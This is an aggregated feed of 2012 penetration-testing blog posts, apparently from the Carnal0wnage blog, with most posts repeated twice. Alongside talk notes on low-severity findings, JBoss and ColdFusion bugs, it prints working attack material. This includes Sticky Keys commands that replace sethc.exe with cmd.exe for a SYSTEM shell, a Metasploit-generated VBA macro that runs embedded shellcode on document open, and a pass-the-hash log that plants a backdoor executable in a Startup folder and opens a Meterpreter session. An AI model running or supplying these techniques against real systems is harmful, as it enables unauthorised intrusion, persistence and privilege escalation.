"Index of" can be your friend and the same with "web mirroring". Unfortunately, and also to the point of the talk/series you have to go look at this crap. It's *usually* not important. stuff like the /icons/ in Apache.

But every now and then pure gold will show up. so you have to go look at it.

LOW?

So some examples of browsable directories that were not /icons/ :-)

yeah yeah but real world?! so for story time, we were doing a PT, the site had SQL Injection so were able to pull down lots of data but the sensitive stuff was *encrypted* so we were kinda stuck. Poking around further we found a directory with indexing enabled. what was there? database backup and a site back up with the decryptMe PHP function along with the current encrypt key :-) All from a "low" vulnerability.

Tags:

April 30, 2012
9:10
Privilege Escalation via "Sticky" Keys
» ‎ carnal0wnage.attackresearch.com

This has been documented all over, but i like things to be on the blog so i can find them...

You can gain a SYSTEM shell on an application you have administrative access on or if you have physical access to the box and can boot to repair disk or linux distro and can change files.

make a copy somewhere of the original on system sethc.exe

copy c:\windows\system32\sethc.exe c:\

cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe

copy cmd.exe into sethc.exe's place

copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

or

cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe

Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing

it would probably be nice to sethc.exe back when you are done.
Tags:

9:10
Privilege Escalation via "Sticky" Keys
» ‎ Carnal0wnage

This has been documented all over, but i like things to be on the blog so i can find them...

You can gain a SYSTEM shell on an application you have administrative access on or if you have physical access to the box and can boot to repair disk or linux distro and can change files.

make a copy somewhere of the original on system sethc.exe

copy c:\windows\system32\sethc.exe c:\

cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe

copy cmd.exe into sethc.exe's place

copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

or

cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe

Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing

it would probably be nice to sethc.exe back when you are done.
Tags: exe sethc system linux-distro system-shell sticky-keys Pentesting

April 27, 2012
5:30
From LOW to PWNED [3] JBoss/Tomcat server-status
» ‎ carnal0wnage.attackresearch.com
Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [3] JBoss/Tomcat server-status

There have been some posts/exploits/modules on hitting up unprotected jboss and tomcat servers.

http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf
http://carnal0wnage.attackresearch.com/2009/11/hacking-unprotected-jboss-jmx-console.html
http://www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
http://goohackle.com/jboss-security-vulnerability-jmx-management-console/

http://www.metasploit.com/modules/exploit/multi/http/jboss_maindeployer
http://www.metasploit.com/modules/exploit/multi/http/tomcat_mgr_deploy

Sometimes even though the deployer functionality is password protected the sever-status may not be.

/web-console/status?full=true

/manager/status/all

LOW?

This can be useful to find:
- Lists of applications
- Recent URL's accessed
- Find hidden services/apps
- Enabled servlets
- owned stuff :-)
Finding 0wned stuff is always fun let's see
Looking at the list of applications list one that doesnt look normal (zecmd)
Following that down leads us to zecmd.jsp that is a jsp shell

If you are interested in zecmd.jsp and jboss worm it comes from --> this is a good write up as well as this OWASP preso https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf
thoughts?
-CG

Tags:

5:30
From LOW to PWNED [3] JBoss/Tomcat server-status
» ‎ Carnal0wnage
Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [3] JBoss/Tomcat server-status

There have been some posts/exploits/modules on hitting up unprotected jboss and tomcat servers.

http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf
http://carnal0wnage.attackresearch.com/2009/11/hacking-unprotected-jboss-jmx-console.html
http://www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
http://goohackle.com/jboss-security-vulnerability-jmx-management-console/

http://www.metasploit.com/modules/exploit/multi/http/jboss_maindeployer
http://www.metasploit.com/modules/exploit/multi/http/tomcat_mgr_deploy

Sometimes even though the deployer functionality is password protected the sever-status may not be.

/web-console/status?full=true

/manager/status/all

LOW?

This can be useful to find:
- Lists of applications
- Recent URL's accessed
- Find hidden services/apps
- Enabled servlets
- owned stuff :-)
Finding 0wned stuff is always fun let's see
Looking at the list of applications list one that doesnt look normal (zecmd)
Following that down leads us to zecmd.jsp that is a jsp shell

If you are interested in zecmd.jsp and jboss worm it comes from --> this is a good write up as well as this OWASP preso https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf
thoughts?
-CG

Tags: talk nbsp tomcat atlanta owasp security-vulnerability bsides Pentesting

April 23, 2012
5:00
From LOW to PWNED [2] ColdFusion
» ‎ carnal0wnage.attackresearch.com
Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [2] ColdFusion

Whhhhaaaat? ColdFusion?
- Originally released in 1995 by Allaire
- Motivation: make it easier to connect simple HTML pages to a database
- Along the way became full Java
- Latest version is ColdFusion 9 released in 2009
- Most recent features focus on integration with other technologies, e.g. Flash, Flex, AIR, Exchange, MS Office, etc.
- Frequent to see CF 7 - 9 on the web
- Open Source CFML avalable as well
- BlueDragon, Railo, Mura CMS
Background Reading:
http://carnal0wnage.attackresearch.com/2011/12/not-0wning-that-coldfusion-server-but.html
http://averagesecurityguy.info/2011/12/09/owning-a-coldfusion-server/
https://media.blackhat.com/bh-us-10/presentations/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-slides.pdf
https://media.blackhat.com/bh-us-10/whitepapers/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-wp.pdf
http://www.orkspace.net/secdocs/Conferences/EuSecWest/2006/ColdFusion%20Security.pdf

LOW?

Two nice bugs exist that I don't think vuln scanners commonly check for

Locale traversal CVE: 2010-2861
coldfusion_locale_traversal.rb

great overview/walkthru here: http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
Vulnerable Versions:
ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4
ColdFusion 9? Immunity reported yes, but Adobe fixed downloadable version of 9. so maaaaaaybe if old version of 9.

*no patches exist for 6 & 7 so if you see CF6 or CF7 its always vuln to the bug*

Adobe XML External Entity Injection: CVE-2009-3960
adobe_xml_inject.rb

advisory info here: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf

There's lots more to the ColdFusion story, enough that I recently gave a talk on it.
Tags:

5:00
From LOW to PWNED [2] ColdFusion
» ‎ Carnal0wnage
Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [2] ColdFusion

Whhhhaaaat? ColdFusion?
- Originally released in 1995 by Allaire
- Motivation: make it easier to connect simple HTML pages to a database
- Along the way became full Java
- Latest version is ColdFusion 9 released in 2009
- Most recent features focus on integration with other technologies, e.g. Flash, Flex, AIR, Exchange, MS Office, etc.
- Frequent to see CF 7 - 9 on the web
- Open Source CFML avalable as well
- BlueDragon, Railo, Mura CMS
Background Reading:
http://carnal0wnage.attackresearch.com/2011/12/not-0wning-that-coldfusion-server-but.html
http://averagesecurityguy.info/2011/12/09/owning-a-coldfusion-server/
https://media.blackhat.com/bh-us-10/presentations/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-slides.pdf
https://media.blackhat.com/bh-us-10/whitepapers/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-wp.pdf
http://www.orkspace.net/secdocs/Conferences/EuSecWest/2006/ColdFusion%20Security.pdf

LOW?

Two nice bugs exist that I don't think vuln scanners commonly check for

Locale traversal CVE: 2010-2861
coldfusion_locale_traversal.rb

great overview/walkthru here: http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
Vulnerable Versions:
ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4
ColdFusion 9? Immunity reported yes, but Adobe fixed downloadable version of 9. so maaaaaaybe if old version of 9.

*no patches exist for 6 & 7 so if you see CF6 or CF7 its always vuln to the bug*

Adobe XML External Entity Injection: CVE-2009-3960
adobe_xml_inject.rb

advisory info here: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf

There's lots more to the ColdFusion story, enough that I recently gave a talk on it.
Tags: directory-traversal bsides vulnerable-versions coldfusion

April 20, 2012
5:00
From LOW to PWNED [1] Exposed Services and Admin Interfaces
» ‎ carnal0wnage.attackresearch.com
Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [1] Exposed Services and Admin Interfaces

Exposed Services:

An example of exposed services and making sure you check for default and common passwords. so first example is a VNC server with no password. This gives us a HIGH severity finding

The following is a VNC server with a password of "password"

see the problem? Same thing goes for SSH, Telnet, FTP, etc. Don't forget about databases as well, MS SQL, MySQL, Oracle, Postgres listening out to the Internet at large.

Admin Interfaces:

Admin interfaces can be gold. the problem is 1) you have to find them on the random ass port they are running on and 2) you have to get eyes on them. this can be a hassle/problem/hard to do.

So to bring the "low" to it. some random HTTP server gets you this in Nessus

Now, to be fair this could be totally accurate, but the point is you need to look at what is being served on this HTTP server, could be something could be nothing, no way to know unless you look. Finding useful HTTP pages on all the random ports can be challenging.

Here is a possible methodology for doing it:
1. Nmap your range
2. Import your nmap results into metasploit
3. Use the db_ searches to pull out a list of hosts & ports
4. With the magic of scripting languages make that list into an html page(s)
5. Use linky to open all those links
Kinda goes like this:
after you have imported your nmap results, uses the services option.
If its populated you'll get a list or results like the below
Output that stuff to a CSV

msf > services -o /tmp/demo.csv

Take that CSV and run some ruby on it

The above code will output an html file that you can open with linky
linky will open each link in a new tab allowing you a way to get eyes on each of those random HTTP(S) services.

You can now start intelligently trying default passwords or viewing exposed content.

Thoughts?

-CG

Tags:

5:00
From LOW to PWNED [1] Exposed Services and Admin Interfaces
» ‎ Carnal0wnage
Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [1] Exposed Services and Admin Interfaces

Exposed Services:

An example of exposed services and making sure you check for default and common passwords. so first example is a VNC server with no password. This gives us a HIGH severity finding

The following is a VNC server with a password of "password"

see the problem? Same thing goes for SSH, Telnet, FTP, etc. Don't forget about databases as well, MS SQL, MySQL, Oracle, Postgres listening out to the Internet at large.

Admin Interfaces:

Admin interfaces can be gold. the problem is 1) you have to find them on the random ass port they are running on and 2) you have to get eyes on them. this can be a hassle/problem/hard to do.

So to bring the "low" to it. some random HTTP server gets you this in Nessus

Now, to be fair this could be totally accurate, but the point is you need to look at what is being served on this HTTP server, could be something could be nothing, no way to know unless you look. Finding useful HTTP pages on all the random ports can be challenging.

Here is a possible methodology for doing it:
1. Nmap your range
2. Import your nmap results into metasploit
3. Use the db_ searches to pull out a list of hosts & ports
4. With the magic of scripting languages make that list into an html page(s)
5. Use linky to open all those links
Kinda goes like this:
after you have imported your nmap results, uses the services option.
If its populated you'll get a list or results like the below
Output that stuff to a CSV

msf > services -o /tmp/demo.csv

Take that CSV and run some ruby on it

The above code will output an html file that you can open with linky
linky will open each link in a new tab allowing you a way to get eyes on each of those random HTTP(S) services.

You can now start intelligently trying default passwords or viewing exposed content.

Thoughts?

-CG

Tags: nbsp admin server don atlanta bsides mysql-oracle vnc-server

April 19, 2012
13:21
From LOW to PWNED [0] Intro
» ‎ carnal0wnage.attackresearch.com

Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [0] Intro/The point of the talk (sorry no pics of msf or courier new font in this one):

I had several points (I think...maybe all the same point...whatever)

1. We tend to have an over reliance on vulnerability scanners to tell us everything that is vulnerable. To be honest I have been guilty of this myself. Most of us probably have a for a variety of reasons, time, experience, level of effort required/paid for, etc. This over reliance on scanners has lead to a "no highs" == "secure environment". Most of us know this is not *always* the case and the point of the talk was to show some examples were medium and low vulnerabilities have led to a further exploitation or impact that I would consider "high" or above. Whether you call them chained exploits, magic, or the natural evolution of taking multiple smaller vulnerabilities and turning them into a significant exploit or opportunity its becoming more normal/common to have to go this route.

2. Given the "no highs" == "secure environment" mentality some clients have been conditioned that anything that is not a high is not exploitable and therefore not a priority for fixing (sometimes ever). This of course is not the outcome most people would recommend. Nevertheless some people take that approach.

3. How many IDS/IPS signatures exist for low and medium vulns and how often do we ignore/disable those? Feedback welcome here.

4. Clients should pay attention to low/medium vulns as much as they do high+ vulns and in turn pentesters/VA people/security teams should also pay attention to low/medium vulns. Does that mean ever SSLv2 enabled should be full out emergency? Hell no, but *someone* needs to be able to vet that those low/medium findings cant be turned into something more.

5. Keep in a human in the mix. Tools/scanner are great for automating tasks but I don't think we are there yet with the technology of taking multiple less severe vulnerabilities and turning them into something significant. Bottom line, the scanner wont find all your ownable stuff, you need a person(s) to do this.

Thoughts?

-CG

Tags:

13:21
From LOW to PWNED [0] Intro
» ‎ Carnal0wnage

Several (tm) months back I did my talk on "From LOW to PWNED" at hashdays and BSides Atlanta.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [0] Intro/The point of the talk (sorry no pics of msf or courier new font in this one):

I had several points (I think...maybe all the same point...whatever)

1. We tend to have an over reliance on vulnerability scanners to tell us everything that is vulnerable. To be honest I have been guilty of this myself. Most of us probably have a for a variety of reasons, time, experience, level of effort required/paid for, etc. This over reliance on scanners has lead to a "no highs" == "secure environment". Most of us know this is not *always* the case and the point of the talk was to show some examples were medium and low vulnerabilities have led to a further exploitation or impact that I would consider "high" or above. Whether you call them chained exploits, magic, or the natural evolution of taking multiple smaller vulnerabilities and turning them into a significant exploit or opportunity its becoming more normal/common to have to go this route.

2. Given the "no highs" == "secure environment" mentality some clients have been conditioned that anything that is not a high is not exploitable and therefore not a priority for fixing (sometimes ever). This of course is not the outcome most people would recommend. Nevertheless some people take that approach.

3. How many IDS/IPS signatures exist for low and medium vulns and how often do we ignore/disable those? Feedback welcome here.

4. Clients should pay attention to low/medium vulns as much as they do high+ vulns and in turn pentesters/VA people/security teams should also pay attention to low/medium vulns. Does that mean ever SSLv2 enabled should be full out emergency? Hell no, but *someone* needs to be able to vet that those low/medium findings cant be turned into something more.

5. Keep in a human in the mix. Tools/scanner are great for automating tasks but I don't think we are there yet with the technology of taking multiple less severe vulnerabilities and turning them into something significant. Bottom line, the scanner wont find all your ownable stuff, you need a person(s) to do this.

Thoughts?

-CG

Tags: talk nbsp medium atlanta vulnerability-scanners natural-evolution bsides

April 11, 2012
11:10
ColdFusion for Pentesters at SOURCE Boston
» ‎ carnal0wnage.attackresearch.com

I'll be giving my ColdFusion for Pentesters talk at SOURCE Boston next week.

Here is the info from the abstract:

"ColdFusion is one of those technologies where organizations are either ColdFusion shops or they won't touch it on a bet. Similarly, I find that pentesters have either been exposed to it and have a few tricks to attack it or not. Aside from common web application issues, ColdFusion can also be attacked on the network level and many times used to obtain remote access on the host. This talk will cover what is ColdFusion, common ColdFusion issues, finding useful ColdFusion URLs, identifying specific ColdFusion version and components, and verifying if common vulnerabilities are present in the ColdFusion server you are targeting. If access to the ColdFusion administrative interface can be obtained, you can perform post exploitation activities that will typically yield you remote access to the operating system supporting the ColdFusion install."

Like the other talks, i'll do the what it is, why you care (?), and some ways to go after it. Hopefully useful/interesting.

Hope to see people there.

-CG

Tags:

11:10
ColdFusion for Pentesters at SOURCE Boston
» ‎ Carnal0wnage

I'll be giving my ColdFusion for Pentesters talk at SOURCE Boston next week.

Here is the info from the abstract:

"ColdFusion is one of those technologies where organizations are either ColdFusion shops or they won't touch it on a bet. Similarly, I find that pentesters have either been exposed to it and have a few tricks to attack it or not. Aside from common web application issues, ColdFusion can also be attacked on the network level and many times used to obtain remote access on the host. This talk will cover what is ColdFusion, common ColdFusion issues, finding useful ColdFusion URLs, identifying specific ColdFusion version and components, and verifying if common vulnerabilities are present in the ColdFusion server you are targeting. If access to the ColdFusion administrative interface can be obtained, you can perform post exploitation activities that will typically yield you remote access to the operating system supporting the ColdFusion install."

Like the other talks, i'll do the what it is, why you care (?), and some ways to go after it. Hopefully useful/interesting.

Hope to see people there.

-CG

Tags: access pentesters coldfusion boston coldfusion-server exploitation-activities administrative-interface

February 03, 2012

Permalink for 'Direct Shellcode Execution via MS Office Macros with Metasploit'

14:21

Direct Shellcode Execution via MS Office Macros with Metasploit

» ‎ carnal0wnage.attackresearch.com

scriptjunkie recently had a post on Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there. How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.

msf > use payload/windows/exec
msf  payload(exec) > set CMD calc
CMD => calc
msf  payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf  payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf

Sub Auto_Open()
        Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
        Dim  Xlbufvetp As LongPtr
#Else
        Dim  Xlbufvetp As Long
#EndIf
        Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
        Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
        For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
                Wyzayxya = Hyeyhafxp(Zolde)
                Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
        Next Zolde
        Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub

The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application.

Tags:

14:21

Direct Shellcode Execution via MS Office Macros with Metasploit

» ‎ Carnal0wnage

msf > use payload/windows/exec
msf  payload(exec) > set CMD calc
CMD => calc
msf  payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf  payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf

Sub Auto_Open()
        Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
        Dim  Xlbufvetp As LongPtr
#Else
        Dim  Xlbufvetp As Long
#EndIf
        Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
        Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
        For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
                Wyzayxya = Hyeyhafxp(Zolde)
                Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
        Next Zolde
        Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub

Tags: byval declare long metasploit macro-code tfe Pentesting

January 23, 2012
11:28
psexec fail? upload and exec instead
» ‎ carnal0wnage.attackresearch.com

I ended up having to use the smb/upload_file module on a pentest. I was able to get the local admin hashes but for some reason the psexec module wouldn't get code execution, it would act like it would work but wasn't. So we decided to push a binary, use winexe that was modified to pass the hash to exec the binary as needed. It went something like this... ##################################################
# add a route to the 10.x network thru session 1
##################################################

msf exploit(handler) > route add 10.0.0.0 255.255.255.0 1
[*] Route added

#######################################################
# psexec wouldnt work. AV eating metsvc most likely...
# used smb/upload_file to place a binary on the box
######################################################
msf exploit(handler) > use auxiliary/admin/smb/upload_file
msf auxiliary(upload_file) > info

Name: SMB File Upload Utility
Module: auxiliary/admin/smb/upload_file
Version: 10394
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
hdm

Basic options:

Name Current Setting Required Description
---- --------------- -------- -----------
LPATH yes The path of the local file to upload
RHOST yes The target address
RPATH yes The name of the remote file relative to the share
RPORT 445 yes Set the SMB service port
SMBSHARE C$ yes The name of a writeable share on the server

Description:
This module uploads a file to a target share and path. The only
reason to use this module is if your existing SMB client is not able
to support the features of the Metasploit Framework that you need,
like pass-the-hash authentication.

msf auxiliary(upload_file) > set SMBUser Administrator
SMBUser => Administrator
smsf auxiliary(upload_file) > set SMBPass aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
SMBPass => aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
msf auxiliary(upload_file) > set RHOST 1.2.3.4
RHOST => 1.2.3.4
msf auxiliary(upload_file) > set LPATH /home/chris/msf3/msf_backdoor.exe
LPATH => /home/chris/msf3/msf_backdoor.exe
msf auxiliary(upload_file) > set RPATH "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\msf_backdoor.exe"
RPATH => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe
msf auxiliary(upload_file) > run
[*] Read 13616 bytes from /home/chris/msf3/msf_backdoor.exe...
[*] Connecting to the server...
[*] Mounting the remote share \\1.2.3.4\C$'...
[*] Trying to upload Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] The file has been uploaded to Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] Auxiliary module execution completed

################################################
#Set up a portforward to talk to hosts via SMB
################################################

meterpreter > portfwd add -l 445 -p 445 -r 1.2.3.4
[*] Local TCP relay created: 0.0.0.0:445 <-> 1.2.3.4:445

#####################################################################
# Use winexe with pass the hash to get cmd shell and run the binary
#####################################################################

user@ubuntu:~/Desktop/winexe-hash$ export SMBHASH=aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
user@ubuntu:~/Desktop/winexe-hash$ ./winexe -U administrator //1.2.3.4 "cmd"
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : inside.company.com
IP Address. . . . . . . . . . . . : 1.2.3.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 1.2.3.254

C:\WINDOWS\system32>
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0007-B088

Directory of C:\Documents and Settings\All Users\Start Menu\Programs\Startup

01/13/2012 03:55 PM .
01/13/2012 03:55 PM ..
01/13/2012 03:55 PM 13,616 msf_backdoor.exe
1 File(s) 13,616 bytes
2 Dir(s) 241,661,345,792 bytes free

C:\Documents and Settings\All Users\Start Menu\Programs\Startup>msf_backdoor.exe
msf_backdoor.exe

C:\Documents and Settings\All Users\Start Menu\Programs\Startup>

[*] 5.5.5.5:4889 Request received for /INITM...
[*] 5.5.5.5:4889 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 5 opened (5.5.5.5:443 -> 6.6.6.6:4889) at Wed Jan 18 22:02:03 +0000 2012

Tags:

11:28
psexec fail? upload and exec instead
» ‎ Carnal0wnage

I ended up having to use the smb/upload_file module on a pentest. I was able to get the local admin hashes but for some reason the psexec module wouldn't get code execution, it would act like it would work but wasn't. So we decided to push a binary, use winexe that was modified to pass the hash to exec the binary as needed. It went something like this... ##################################################
# add a route to the 10.x network thru session 1
##################################################

msf exploit(handler) > route add 10.0.0.0 255.255.255.0 1
[*] Route added

#######################################################
# psexec wouldnt work. AV eating metsvc most likely...
# used smb/upload_file to place a binary on the box
######################################################
msf exploit(handler) > use auxiliary/admin/smb/upload_file
msf auxiliary(upload_file) > info

Name: SMB File Upload Utility
Module: auxiliary/admin/smb/upload_file
Version: 10394
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
hdm

Basic options:

Name Current Setting Required Description
---- --------------- -------- -----------
LPATH yes The path of the local file to upload
RHOST yes The target address
RPATH yes The name of the remote file relative to the share
RPORT 445 yes Set the SMB service port
SMBSHARE C$ yes The name of a writeable share on the server

Description:
This module uploads a file to a target share and path. The only
reason to use this module is if your existing SMB client is not able
to support the features of the Metasploit Framework that you need,
like pass-the-hash authentication.

msf auxiliary(upload_file) > set SMBUser Administrator
SMBUser => Administrator
smsf auxiliary(upload_file) > set SMBPass aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
SMBPass => aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
